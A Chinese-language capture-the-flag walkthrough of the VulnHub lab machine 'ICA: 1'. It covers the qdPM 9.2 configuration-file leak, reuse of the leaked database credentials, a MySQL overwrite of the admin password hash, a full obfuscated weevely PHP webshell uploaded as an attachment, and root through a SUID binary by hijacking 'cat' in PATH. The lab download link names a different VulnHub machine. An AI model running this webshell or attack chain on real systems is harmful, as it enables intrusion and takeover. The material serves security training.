英文名稱：ICA: 1
中文名稱：ICA: 1
釋出日期：2021 年 9 月 25 日
難度：容易
描述：根據我們情報網絡的資訊，ICA 正在開展一個秘密項目。我們需要弄清楚這個項目是什麼。獲得通路資訊後，請将其發送給我們。我們稍後會放置一個後門來通路系統。您隻需關注項目是什麼。您可能必須通過幾層安全性。原子能機構對您将成功完成這項任務充滿信心。祝你好運，代理！
下載下傳位址：https://www.vulnhub.com/entry/empire-breakout,751/

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

1、開局資訊（IP位址：192.168.199.168）

開機

2、端口掃描，開放了22、80、3306端口，還有資料庫的鹽

Salt: O*IDsu\x1B	Zp4BOQ#,Uo,S

端口掃描

3、檢視首頁，是一個登入頁面，需要郵箱和密碼

web首頁

4、嘗試掃描網站其他目錄，拿到網站安裝目錄

網站安裝目錄

5、嘗試查詢qdPM 9.2系統漏洞

qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt

喜提qdPM 9.2系統漏洞

6、檢視漏洞利用方式

The password and connection string for the database are stored in a yml file. 
To access the yml file you can go to http://<website>/core/config/databases.yml file and download. 
  
資料庫的密碼和連接配接字元串存儲在 yml 檔案中。 要通路 yml 檔案，
您可以通路 http://<website>/core/config/databases.yml 檔案并下載下傳。

漏洞利用方式

7、下載下傳yaml檔案，喜提使用者名和密碼

qdpmadmin
UcVQCMQk2STVeS6J

喜提使用者名和密碼

8、登入mysql資料庫

mysql -h 192.168.199.168 -u qdpmadmin -p
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| qdpm               |
| staff              |
| sys                |
+--------------------+

進入資料庫

5、進入qdpm資料庫，檢視包含的表

MySQL [(none)]> use qdpm
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [qdpm]> show tables;
+----------------------+
| Tables_in_qdpm       |
+----------------------+
| attachments          |
| configuration        |
| departments          |
| discussions          |
| discussions_comments |
| discussions_reports  |
| discussions_status   |
| events               |
| extra_fields         |
| extra_fields_list    |
| phases               |
| phases_status        |
| projects             |
| projects_comments    |
| projects_phases      |
| projects_reports     |
| projects_status      |
| projects_types       |
| tasks                |
| tasks_comments       |
| tasks_groups         |
| tasks_labels         |
| tasks_priority       |
| tasks_status         |
| tasks_types          |
| tickets              |
| tickets_comments     |
| tickets_reports      |
| tickets_status       |
| tickets_types        |
| user_reports         |
| users                |
| users_groups         |
| versions             |
| versions_status      |
+----------------------+
35 rows in set (0.021 sec)

6、檢視配置表，喜提web站點的使用者名和密碼，但是無法登入

|  1 | app_administrator_email              | [email protected]                                                                                                      |
|  2 | app_administrator_password           | $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0

檢視表内容

7、由于無法破解管理者的密碼，但是可以修改密碼

$P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 長度是34個字元，并不是簡單的Hash生成的，而是crypt(3) Hash，是一個基于改進 DES 算法的單向散列函數，先生成明文為“ailx10”的crypt(3) Hash備用，更新密碼

MySQL [qdpm]> update configuration set value="$1$m0IX0vwl$HR6rGO5FjvC39TsfOXWLK0" where id=2;
Query OK, 1 row affected (0.007 sec)
Rows matched: 1  Changed: 1  Warnings: 0

建立新的密碼

8、成功登入管理者web頁面

使用者名：[email protected]
密碼：ailx10

登入管理者背景成功

9、嘗試檔案上傳，新增使用者可以上傳頭像

新增使用者

但是隻能看到圖檔

上傳的圖檔

10、切換到新使用者ailx10登入，發現可以上傳附件，制作webshell檔案并上傳

┌──(ailx10㉿kali)-[~]
└─$ weevely generate ailx10 ./ailx10.php            
Generated './ailx10.php' with password 'ailx10' of 771 byte size.
                                                                                                                                       
┌──(ailx10㉿kali)-[~]
└─$ cat ailx10.php 
<?php
$k='$k="83b70Yz5Yz04";$kYzh="e0d874Yz2ddYz5Yzb6";$kf="Yz6e6962eb8aYz35";$p=Yz"VkTYzVUW2Z';
$I='Yz(@baYzse64_decoYzde($mYz[1]),$k))Yz);$Yzo=@oYzb_get_Yzcontents()Yz;@ob_endYz_cleaYzn';
$G='zYzntYzents("php:Yz//input"),$Yzm)==1) {@obYz_Yzstart();@eYzval(@YzgzuncoYzmpress(@x';
$O='z"Yz;Yzfor(Yz$i=0;$i<$l;){for($j=0;($j<Yz$c&&Yz$i<$l);$jYz++,$i+Yz+Yz){$o.=$t{$i}Yz^$k{';
$s=str_replace('ij','','cijreatije_ijfuijncijijtion');
$P='$j}Yz;}}rYzeYzturn $o;Yz}if Yz(@prYzeg_matcYzh("Yz/$kh(.+)$YzkYzf/"Yz,@file_get_coY';
$i='MYzT1JVyFr";fYzuYzYznction x($t,$k)Yz{$c=sYztYzrlen($k);$l=sYztrlYzen($t);Yz$o="YzY';
$N='();$Yzr=@base6Yz4_eYzncodYze(@x(Yz@gzcoYzmpress($o),$YzkYz));print("$pYz$kh$rYz$kf");}';
$J=str_replace('Yz','',$k.$i.$O.$P.$G.$I.$N);
$m=$s('',$J);$m();
?>

上傳附件

11、成功獲得webshell

weevely http://192.168.199.168/uploads/attachments/575837-ailx10.php ailx10

獲得webshell

12、尋找可疑檔案，發現/opt/get_access

find / -perm -u=s 2>&1 | grep -v "Permission denied"

尋找可疑檔案

13、對該檔案進行分析，發現執行了cat /root/system.info

www-data@debian:/home $ ls -hl /opt/get_access
-rwsr-xr-x 1 root root 17K Sep 25  2021 /opt/get_access
www-data@debian:/home $ /opt/get_access

  ############################
  ########     ICA     #######
  ### ACCESS TO THE SYSTEM ###
  ############################

  Server Information:
   - Firewall:	AIwall v9.5.2
   - OS:	Debian 11 "bullseye"
   - Network:	Local Secure Network 2 (LSN2) v 2.4.1

All services are disabled. Accessing to the system is allowed only within working hours.
www-data@debian:/home $ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3#34;
GCC: (Debian 10.2.1-6) 10.2.1 20210110

14、嘗試設定環境變量，發現這個shell沒有這個能力

更新cat 指令為shell

echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat

嘗試設定環境變量

15、webshell能力很弱，更換成反彈shell，成功設定好環境變量

┌──(root㉿kali)-[/home/ailx10]
└─# find / -name "php-reverse-shell.php" 2>/dev/null                   
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

反彈shell，設定環境變量

16、成功進階成root權限

獲得root權限

17、找出2個flag，一個普通使用者，一個特權使用者

2個flag

到此，實驗完成～

vulnhub刷題記錄（ICA: 1）